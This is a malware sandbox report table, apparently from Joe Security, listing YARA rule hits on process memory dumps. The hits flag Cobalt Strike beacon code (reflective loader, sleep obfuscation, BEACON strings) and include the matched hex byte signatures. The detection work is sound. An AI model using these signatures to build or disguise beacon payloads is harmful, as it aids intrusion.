00000000.00000002.3254928165.00000215D7940000.00000040.00001000.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x189b3:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x17d56:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000003.2033734612.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2033734612.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.2033734612.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x306e5:$a39: %s as %s\%s: %d 0x3f500:$a41: beacon.x64.dll 0x318ee:$a46: %s (admin) 0x30845:$a48: %s%s: %s 0x30711:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x3073d:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x31937:$a51: Content-Length: %d
00000000.00000003.2033734612.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1d0b1:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.2033734612.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x3f69b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2033734612.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1a98b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1bc3c:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2033734612.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x1b86c:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x1ac0f:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000003.2034996552.00000215D7DD7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2034996552.00000215D7DD7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.2034996552.00000215D7DD7000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x2cb90:$a39: %s as %s\%s: %d 0x3be42:$a41: beacon.x64.dll 0x2dda0:$a46: %s (admin) 0x2ccf0:$a48: %s%s: %s 0x2cbbc:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x2cbe8:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x2dde9:$a51: Content-Length: %d
00000000.00000003.2034996552.00000215D7DD7000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x19428:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.2034996552.00000215D7DD7000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x3c1ab:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2034996552.00000215D7DD7000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x16d02:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x17fb3:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2034996552.00000215D7DD7000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x17be3:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x16f86:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000003.2035286946.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2035286946.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.2035286946.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x336e5:$a39: %s as %s\%s: %d 0x42500:$a41: beacon.x64.dll 0x348ee:$a46: %s (admin) 0x33845:$a48: %s%s: %s 0x33711:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x3373d:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x34937:$a51: Content-Length: %d
00000000.00000003.2035286946.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x200b1:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.2035286946.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x4269b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2035286946.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1d98b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1ec3c:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2035286946.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x1e86c:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x1dc0f:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000003.2029066908.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2029066908.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.2029066908.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x326e5:$a39: %s as %s\%s: %d 0x41500:$a41: beacon.x64.dll 0x338ee:$a46: %s (admin) 0x32845:$a48: %s%s: %s 0x32711:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x3273d:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x33937:$a51: Content-Length: %d
00000000.00000003.2029066908.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1f0b1:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.2029066908.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x4169b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2029066908.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1c98b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1dc3c:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2029066908.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x1d86c:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x1cc0f:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000003.2009609332.00000215D7880000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.2009609332.00000215D7880000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1a136:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.2009609332.00000215D7880000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x17a10:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x18cc1:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2009609332.00000215D7880000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x188f1:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x17c94:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000003.2009592329.00000215D7805000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2012673442.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2012673442.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.2012673442.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x316e5:$a39: %s as %s\%s: %d 0x40500:$a41: beacon.x64.dll 0x328ee:$a46: %s (admin) 0x31845:$a48: %s%s: %s 0x31711:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x3173d:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x32937:$a51: Content-Length: %d
00000000.00000003.2012673442.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1e0b1:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.2012673442.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x4069b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2012673442.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1b98b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1cc3c:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2012673442.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x1c86c:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x1bc0f:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000003.2034996552.00000215D7E15000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2034996552.00000215D7E15000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.2034996552.00000215D7E15000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x328f0:$a39: %s as %s\%s: %d 0x41ba2:$a41: beacon.x64.dll 0x33b00:$a46: %s (admin) 0x32a50:$a48: %s%s: %s 0x3291c:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x32948:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x33b49:$a51: Content-Length: %d
00000000.00000003.2034996552.00000215D7E15000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1f188:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.2034996552.00000215D7E15000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x41f0b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2034996552.00000215D7E15000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1ca62:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1dd13:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2034996552.00000215D7E15000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x1d943:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x1cce6:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000003.2009574337.00000215D77FC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000002.3255937250.00000217D9E50000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.3255937250.00000217D9E50000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x137:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2013941314.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2013941314.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.2013941314.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x306e5:$a39: %s as %s\%s: %d 0x3f500:$a41: beacon.x64.dll 0x318ee:$a46: %s (admin) 0x30845:$a48: %s%s: %s 0x30711:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x3073d:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x31937:$a51: Content-Length: %d
00000000.00000003.2013941314.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1d0b1:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.2013941314.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x3f69b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2013941314.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1a98b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1bc3c:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2013941314.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x1b86c:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x1ac0f:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000003.2008825010.00000215D77DA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2008825010.00000215D77DA000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x18769:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2009488257.00000215D77FC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2008952668.00000215D77DA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2008952668.00000215D77DA000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x18769:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000002.3254228521.00000215D76E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000002.3254228521.00000215D76E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.3254228521.00000215D76E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x2cd60:$a39: %s as %s\%s: %d 0x3c012:$a41: beacon.x64.dll 0x2df70:$a46: %s (admin) 0x2cec0:$a48: %s%s: %s 0x2cd8c:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x2cdb8:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x2dfb9:$a51: Content-Length: %d
00000000.00000002.3254228521.00000215D76E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x195f8:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000002.3254228521.00000215D76E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x3c37b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000002.3254228521.00000215D76E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x16ed2:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x18183:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000002.3254228521.00000215D76E0000.00000040.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen
00000000.00000003.2037561994.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2037561994.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.2037561994.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x306e5:$a39: %s as %s\%s: %d 0x3f500:$a41: beacon.x64.dll 0x318ee:$a46: %s (admin) 0x30845:$a48: %s%s: %s 0x30711:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x3073d:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x31937:$a51: Content-Length: %d
00000000.00000003.2037561994.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1d0b1:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.2037561994.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x3f69b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2037561994.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1a98b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1bc3c:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2037561994.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x1b86c:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x1ac0f:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000002.3255064017.00000215D7A0E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000002.3255217619.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000002.3255217619.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
